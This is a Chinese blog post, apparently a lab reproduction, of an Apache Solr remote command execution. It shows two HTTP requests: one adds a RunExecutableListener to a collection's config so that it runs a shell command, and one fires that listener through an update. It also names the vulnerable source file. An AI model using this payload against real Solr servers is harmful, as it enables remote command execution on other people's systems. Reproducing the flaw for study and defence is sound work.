Apache Solr - XXE & RCE （2）

时间：2020-03-28 20:22:56 阅读：141 评论：0 收藏：0 [点我收藏+]

标签：http htm 调试 com exe touch blog rgs alt

Apache Solr - XXE & RCE （2）

0x01 前言

部署那一块请看上一篇文章

https://www.cnblogs.com/0x28/p/12585472.html

0x02 复现

在创建了一个collection为test的基础上调用该collection的config

POST /solr/test/config HTTP/1.1
Host: 192.168.52.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 162

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

触发

POST /solr/test/update HTTP/1.1
Host: 192.168.52.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 19

[{"id":"test"}]

0x03 调试
漏洞位置在于

solr/core/src/java/org/apache/solr/core/RunExecutableListener.java

技术图片

目前只能跟大部分文章一样跟到这个漏洞点。。。这个调用链实在是太复杂了 ??
先挖个坑，后边再补。

Apache Solr - XXE & RCE （2）

标签：http htm 调试 com exe touch blog rgs alt

原文地址：https://www.cnblogs.com/0x28/p/12588839.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行